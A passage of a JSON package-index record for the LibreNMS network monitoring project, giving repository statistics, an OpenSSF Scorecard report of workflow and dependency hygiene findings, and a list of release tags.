[{"id":609448,"name":"librenms/librenms","ecosystem":"packagist","description":"A fully featured network monitoring system that provides a wealth of features and device support.","homepage":"https://www.librenms.org/","licenses":"GPL-3.0-or-later","normalized_licenses":["GPL-3.0-or-later"],"repository_url":"https://github.com/librenms/librenms","keywords_array":["network","monitoring","billing","snmp","alerting","distributed","discovery"],"namespace":"librenms","versions_count":167,"first_release_published_at":"2016-08-28T13:56:02.000Z","latest_release_published_at":"2026-08-28T12:11:28.000Z","latest_release_number":"26.8.2","last_synced_at":"2026-09-02T13:28:51.393Z","created_at":"2022-04-07T10:03:22.328Z","updated_at":"2026-09-03T00:15:39.232Z","registry_url":"https://packagist.org/packages/librenms/librenms#","install_command":"composer require librenms/librenms","documentation_url":null,"metadata":{"funding":[{"url":"https://opencollective.com/librenms","type":"opencollective"}]},"repo_metadata":{"id":37380400,"uuid":"13914116","full_name":"librenms/librenms","owner":"librenms","description":"Community-based GPL-licensed network monitoring system","archived":false,"fork":false,"pushed_at":"2026-08-24T22:57:12.000Z","size":374344,"stargazers_count":4845,"open_issues_count":226,"forks_count":2767,"subscribers_count":136,"default_branch":"master","last_synced_at":"2026-08-25T03:33:22.864Z","etag":null,"topics":["hacktoberfest","laravel","librenms","monitoring","network","php","rrd","snmp"],"latest_commit_sha":null,"homepage":"https://www.librenms.org","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/librenms.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE.txt","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":"AUTHORS.md","dei":null,"publiccode":"publiccode.yml","codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"github":null,"patreon":null,"open_collective":"librenms","ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2013-10-28T01:37:13.000Z","updated_at":"2026-08-24T22:57:19.000Z","dependencies_parsed_at":"2025-12-07T03:06:54.786Z","dependency_job_id":"5ed49e0f-150f-439d-9a94-d9137908ddb9","html_url":"https://github.com/librenms/librenms","commit_stats":{"total_commits":18156,"total_committers":1420,"mean_commits":"12.785915492957747","dds":0.8496915620180656,"last_synced_commit":"fe2785c0bb8e76e79d21b5601570722a5c27a5ab"},"previous_names":[],"tags_count":180,"template":false,"template_full_name":null,"purl":"pkg:github/librenms/librenms","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/librenms","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/sbom","scorecard":{"id":578830,"data":{"date":"2025-08-11","repo":{"name":"github.com/librenms/librenms","commit":"9487f4a90bcea19a2bd7f9a139d94dbaa5c2fcee"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":3.7,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 10 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 18/29 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: script injection with untrusted input ' github.event.pull_request.title ': .github/workflows/announcements.yml:18","Warn: script injection with untrusted input ' github.event.pull_request.body ': .github/workflows/announcements.yml:18"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/lint.yml:13","Warn: jobLevel 'checks' permission set to 'write': .github/workflows/lint.yml:14","Warn: no topLevel permission defined: .github/workflows/announcements.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/doc.yml:20","Info: topLevel 'contents' permission set to 'read': .github/workflows/label-actions.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:12","Warn: no topLevel permission defined: .github/workflows/web.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch '24.8'","Info: 'allow deletion' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'master'","Warn: required approving review count is 1 on branch 'master'","Warn: codeowners review is not required on branch 'master'","Info: status check found to merge onto on branch 'master'","Info: PRs are required in order to make changes on branch 'master'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":1,"reason":"9 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-vc8w-jr9v-vj7f","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-v9hf-5j83-6xpp","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/doc.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/doc.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/doc.yml:46: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/doc.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/doc.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/doc.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/label-actions.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/label-actions.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/lint.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/lint.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/lint.yml:70: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/lint.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/lint.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/lint.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/lint.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/lint.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:44: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:62: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:82: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:168: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:177: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/web.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/web.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/web.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/web.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/web.yml:86: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/web.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/web.yml:93: update your workflow using https://app.stepsecurity.io/secureworkflow/librenms/librenms/web.yml/master?enable=pin","Warn: containerImage not pinned by hash: doc/Dockerfile:1: pin your Docker image by updating squidfunk/mkdocs-material:9.6.14 to squidfunk/mkdocs-material:9.6.14@sha256:eb04b60c566a8862be6b553157c16a92fbbfc45d71b7e4e8593526aecca63f52","Warn: pipCommand not pinned by hash: doc/Dockerfile:3-11","Warn: pipCommand not pinned by hash: daily.sh:136","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:91","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:92","Info:   0 out of  11 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}}]},"last_synced_at":"2025-08-20T18:36:25.152Z","repository_id":37380400,"created_at":"2025-08-20T18:36:25.153Z","updated_at":"2025-08-20T18:36:25.153Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36914422,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-26T02:00:06.703Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"librenms","name":"LibreNMS Project","uuid":"5791783","kind":"organization","description":"Fully featured network monitoring system that provides a wealth of features and device support","email":null,"website":"https://www.librenms.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/5791783?v=4","repositories_count":17,"last_synced_at":"2024-04-13T04:42:39.079Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/librenms","funding_links":[],"total_stars":4404,"followers":148,"following":0,"created_at":"2022-11-08T08:46:57.336Z","updated_at":"2024-04-13T04:42:45.678Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/librenms","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/librenms/repositories"},"tags":[{"name":"26.7.0","sha":"bbd78db5510d671cc9d303f24a966b33d4ecb2d8","kind":"commit","published_at":"2026-07-20T15:51:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.7.0/manifests"},{"name":"26.6.1","sha":"9f6a2950ffb3668c2735508f27ac87c7e9564308","kind":"commit","published_at":"2026-06-17T14:28:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.6.1","html_url":"https://github.com/librenms/librenms/releases/tag/26.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.6.1/manifests"},{"name":"26.6.0","sha":"a2a0405f2f580c70cae81692e437440a3a87fca0","kind":"commit","published_at":"2026-06-15T07:02:37.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.6.0/manifests"},{"name":"26.5.1","sha":"cd03f8a076c38f90b4b238d557eb8285bd9fffca","kind":"commit","published_at":"2026-05-20T10:00:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.5.1","html_url":"https://github.com/librenms/librenms/releases/tag/26.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.5.1/manifests"},{"name":"26.5.0","sha":"403fa2ddf262d4cbd7e1748ed7678468cc7248d1","kind":"commit","published_at":"2026-05-18T07:56:04.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.5.0/manifests"},{"name":"26.4.1","sha":"c770a7f16c945b316f192d61c89437010aba7f5a","kind":"commit","published_at":"2026-04-22T20:51:07.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.4.1","html_url":"https://github.com/librenms/librenms/releases/tag/26.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.4.1/manifests"},{"name":"26.4.0","sha":"5e70937c141d494b54215c973a62ec0fd9e3543a","kind":"commit","published_at":"2026-04-20T05:50:04.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.4.0/manifests"},{"name":"26.3.1","sha":"246f795d966f2d7f390b1fcb6249d8a4510f14db","kind":"commit","published_at":"2026-03-17T09:25:34.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.3.1","html_url":"https://github.com/librenms/librenms/releases/tag/26.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.3.1/manifests"},{"name":"26.3.0","sha":"49cf73a0b8237c492a917acb512b03fb3b40390d","kind":"commit","published_at":"2026-03-16T11:02:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.3.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.3.0/manifests"},{"name":"26.2.0","sha":"eeaa05618c22140d087739097b217800b0d6621f","kind":"commit","published_at":"2026-02-16T12:13:17.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.2.0/manifests"},{"name":"26.1.1","sha":"8a9cb68bd59a721252abb0e61c14168183065595","kind":"commit","published_at":"2026-01-12T23:25:32.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.1.1","html_url":"https://github.com/librenms/librenms/releases/tag/26.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.1.1/manifests"},{"name":"26.1.0","sha":"fbedc95a015b6b6bbcaf4c0d947e3f0fc80c88c4","kind":"commit","published_at":"2026-01-12T04:00:39.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/26.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/26.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@26.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/26.1.0/manifests"},{"name":"25.12.0","sha":"dc27eaef9f8079c7f64b84d1488d956b2aac75ad","kind":"commit","published_at":"2025-12-15T14:05:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.12.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.12.0/manifests"},{"name":"25.11.0","sha":"aa2146888bee34ae7b250f14992a2f195ffa0c53","kind":"commit","published_at":"2025-11-17T13:29:12.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.11.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.11.0/manifests"},{"name":"25.10.0","sha":"7393c0337c12166b3a95485a9e805b4c9a88239f","kind":"commit","published_at":"2025-10-15T08:32:07.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.10.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.10.0/manifests"},{"name":"25.9.1","sha":"8536ba03ea3b8c5664bf48462563eb8bb7fa2b01","kind":"commit","published_at":"2025-09-17T16:23:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.9.1","html_url":"https://github.com/librenms/librenms/releases/tag/25.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.9.1/manifests"},{"name":"25.9.0","sha":"191fd64383f373f8f773a2f5a352c23eac5234c5","kind":"commit","published_at":"2025-09-16T21:49:14.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.9.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.9.0/manifests"},{"name":"25.8.0","sha":"14bb598f7a48a9ef334424b8093ac68b66ec6559","kind":"commit","published_at":"2025-08-18T04:52:11.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.8.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.8.0/manifests"},{"name":"25.7.0","sha":"0b7de68773377005d2a768d83168b8358da97e73","kind":"commit","published_at":"2025-07-16T12:01:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.7.0/manifests"},{"name":"25.6.0","sha":"81678974e2a83de6aa36349cc1ab16ef917ea7a9","kind":"commit","published_at":"2025-06-16T11:55:12.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.6.0/manifests"},{"name":"25.5.0","sha":"88fe1a7abdb500d9a2d4c45f9872df54c9ff8062","kind":"commit","published_at":"2025-05-16T15:51:05.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.5.0/manifests"},{"name":"25.4.0","sha":"63f72897084b4d7105fd2aa97bb178c32d798275","kind":"commit","published_at":"2025-04-14T12:11:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.4.0/manifests"},{"name":"25.3.0","sha":"92a490aa30d0670a780630aa8f0f4c6346d81b11","kind":"commit","published_at":"2025-03-16T23:10:07.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.3.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.3.0/manifests"},{"name":"25.2.0","sha":"49d2fce4a3ad47bcc61b2d502f0c94ba926b9f2b","kind":"commit","published_at":"2025-02-20T10:55:43.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.2